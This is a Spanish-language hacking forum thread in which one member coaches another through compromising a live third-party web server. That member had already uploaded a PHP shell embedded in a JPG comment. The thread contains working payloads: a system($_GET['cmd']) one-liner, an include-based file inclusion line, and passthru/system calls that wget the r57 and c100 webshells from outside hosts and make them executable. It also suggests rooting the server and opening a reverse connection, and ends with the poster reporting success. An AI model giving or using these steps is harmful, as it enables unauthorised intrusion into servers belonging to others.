[SOLUCIONADO] Ejecutar comandos desde una Shell

Iniciado por LKI, Febrero 18, 2016, 05:02:58 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Febrero 18, 2016, 05:02:58 PM Ultima modificación: Febrero 20, 2016, 02:20:37 AM por EPSILON
Hola underc0ders tengo una duda sobre una vulnerabilidad..
He logrado subir mi shell a un servidor vulnerable, logre cambiar el formato de mi imagen jpg a .php.
Pero no se como ejecutarla o como se haría ya he probado con .php?cmd=ls y no ha funcionado....
Aclaro que el codigo php lo incruste en la sección de comentario del archivo jpg y luego logre cambiar su extension por php..
Saben como podria ejecutar mi codigo? si es correcto? o deberia buscar alguna otra shell?.

Desde ya muchas gracias a todos  los que deseen ayudarme , no tengo ningún fin malintencionado si logro vulnerar el servidor me comunicare con el webmaster para avisarle y que lo fixee.



PD: Buque en la sección pero no arrojo ningún resultado, por eso es que acudo a ustedes..
Ser mejor cada día es mi meta

=LKI=

Puede ser que el servidor tenga desactivado por defecto las funciones que se utilizan para ejecutar comandos en php, para comprobar esto subi un script con:
Código: php
<?php
phpinfo();
?>


y fijate en la parte donde dice "disable_functions"



Si ves que la función system() aparece, no vas a poder utilizarla, como alternativa podrias probar por ejemplo passthru(), ahora bien si aparecen todas las funciones que te permitan ejecutar comandos vas a tener que probar algún tipo de bypass para poder utilizarlos xD.

O si no puede ser que no se este interpretando bien el script php porque esta embebido en una imagen, chekea que este punto y coma todo bien.

Saludos!, EPSILON

Muchas gracias por tu respuesta! . En seguida te digo si funciona.
Ser mejor cada día es mi meta

=LKI=

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Puede ser que el servidor tenga desactivado por defecto las funciones que se utilizan para ejecutar comandos en php, para comprobar esto subi un script con:
Código: php
<?php
phpinfo();
?>


y fijate en la parte donde dice "disable_functions"



Si ves que la función system() aparece, no vas a poder utilizarla, como alternativa podrias probar por ejemplo passthru(), ahora bien si aparecen todas las funciones que te permitan ejecutar comandos vas a tener que probar algún tipo de bypass para poder utilizarlos xD.

O si no puede ser que no se este interpretando bien el script php porque esta embebido en una imagen, chekea que este punto y coma todo bien.

Saludos!, EPSILON

Revise lo que me dijiste aca te dejo la captura no aparece el comando system...



te dejo el texto por si no ves bien, estos son los que aparecen como disabled:
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,   pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,

¿Ahora que tipo de comando podria incluir que comprometa aun mas la vulnerabilidad del servidor? y que entre en el poco campo de texto de los comentarios de una foto?
Ser mejor cada día es mi meta

=LKI=

Febrero 18, 2016, 09:33:38 PM #4 Ultima modificación: Febrero 18, 2016, 09:36:25 PM por EPSILON
Esta todo bien, si podes tirar comandos por consola en ese servidor, por lo que yo diría que el código php esta mal embebido en la imagen entonces el servidor no lo interpreta como debería, entonces primero que nada te pregunto si elemental que uses ese tipo de bypass? osea si si o si tenes que bypassear el content-type? en una de esas con cambiar la extensión ya esta; y si no vas a tener que ver bien como metes el código php en la imagen esto que te paso es comuna a mi me paso un par de veces, proba con otras imágenes preferentemente *.gif y juga hasta que lo logres. y respecto a lo ultimo que me decías, ese script que queres ejecutar en el servidor es lo máximo que podes hacer sin ser root (tirar comandos) si queres comprometer mas el servidor tenes que tratar de rootearlo con algún exploit. Ahora bien yo te recomiendo que en vez de que andes tirando comandos te bajes en el servidor una webshell y listo, es lo mas cómodo para trabajar, podes probar con esto:

Código: php
<?php
passthru('wget http://www.r57shell.net/shell/r57.txt -O R57.php && chmod 777 R57.php');
?>


Obviamente si queres podes probar con otra webshell que te guste mas, con esto usas la funcion passthru() para ejecutar WGET, bajar una webshell .txt (si osi tiene que ser asi) y la renombra a .php, luego le da permisos de ejecución. Con esto directamente ejecutas la webshell desde la URL y chau.

Saludos!, EPSILON

Muchas gracias!!! Si la verdad que creo que el primer php estaba mal embebido...
Voy a probar con esa shell o con la c99 traducida que esta colgada acá en underc0de..
Voy a ver si puedo con otras extensiones como me dijiste y te cuento que tal va parece que todo va encaminado. Gracias!!
Ser mejor cada día es mi meta

=LKI=

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Esta todo bien, si podes tirar comandos por consola en ese servidor, por lo que yo diría que el código php esta mal embebido en la imagen entonces el servidor no lo interpreta como debería, entonces primero que nada te pregunto si elemental que uses ese tipo de bypass? osea si si o si tenes que bypassear el content-type? en una de esas con cambiar la extensión ya esta; y si no vas a tener que ver bien como metes el código php en la imagen esto que te paso es comuna a mi me paso un par de veces, proba con otras imágenes preferentemente *.gif y juga hasta que lo logres. y respecto a lo ultimo que me decías, ese script que queres ejecutar en el servidor es lo máximo que podes hacer sin ser root (tirar comandos) si queres comprometer mas el servidor tenes que tratar de rootearlo con algún exploit. Ahora bien yo te recomiendo que en vez de que andes tirando comandos te bajes en el servidor una webshell y listo, es lo mas cómodo para trabajar, podes probar con esto:

Código: php
<?php
passthru('wget http://www.r57shell.net/shell/r57.txt -O R57.php && chmod 777 R57.php');
?>


Obviamente si queres podes probar con otra webshell que te guste mas, con esto usas la funcion passthru() para ejecutar WGET, bajar una webshell .txt (si osi tiene que ser asi) y la renombra a .php, luego le da permisos de ejecución. Con esto directamente ejecutas la webshell desde la URL y chau.

Saludos!, EPSILON

Muchas gracias!! te comento todo lo que he ido descubriendo gracias a tu ayuda:
Probe el comando que descarga la shell y al ir a la ruta de la imagen con la extension .php la pantalla se quedaba en blanco y no se veia la shell..
Luego probe con el comando
Código: php
 <?php system($_GET['cmd']);?>
y funciono! ejecute el comando php?cmd= ls y vi una lista de imagenes subidas y sorpresivamente vi el archivo R57.php entre la lista trate de acceder a el via url y de vuelta se volvió a poner la pantalla en blanco sin dejarme entrar a la shell...

Ademas probe el comando :
Código: php
 <?php include($_GET["module"].".php"); ?> 


Y al tratar de acceder e incluir mi shell via No tienes permitido ver los links. Registrarse o Entrar a mi cuenta no respondió...


¿Alguna otra sugerencia?. Desde ya muchísimas gracias!
Ser mejor cada día es mi meta

=LKI=

Porque no subes una shell y realizas una conexión inversa?



@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta se podría decir que ya tenes comprometida la web por que tenes shell y podes tirar comandos, ahora bien la webshell si se subio y se le dio permisos pero por alguna razón el servidor no la interpreta, anda jugando y probando con otras webshells como hiciste con las imágenes, esto es asi es probar y probar alternativas hasta que se de, también como dices podrías crear un rfi e incluir la shell desde ahi.

Saludos!, EPSILON

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta proba subiendo este code tal cual y ejecutalo:

Código: php
<?php
system('wget http://www.c99shellphp.com/shell/c100.txt -O c100.php');
?>


luego te vas a la url y pones /c100.php y listo, te tiene que funcionar si o si yo lo probé en local y me funciono.

Saludos!, EPSILON

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta proba subiendo este code tal cual y ejecutalo:

Código: php
<?php
system('wget http://www.c99shellphp.com/shell/c100.txt -O c100.php');
?>


luego te vas a la url y pones /c100.php y listo, te tiene que funcionar si o si yo lo probé en local y me funciono.

Saludos!, EPSILON



Funcionó muchas gracias!!!!!
Saludos en serio me ha servido mucho lo que me has enseñado!!
Ser mejor cada día es mi meta

=LKI=

De nada compañero! para eso estamos, ahora si quieres puedes subir mas fácilmente otra webshell que te quede mas cómoda desde el upload de esa webshell que subiste.
Ahora si puede dar por solucionado este post, cualquier otra duda no dudes en postearla acá y te ayudaremos.

Saludos!, EPSILON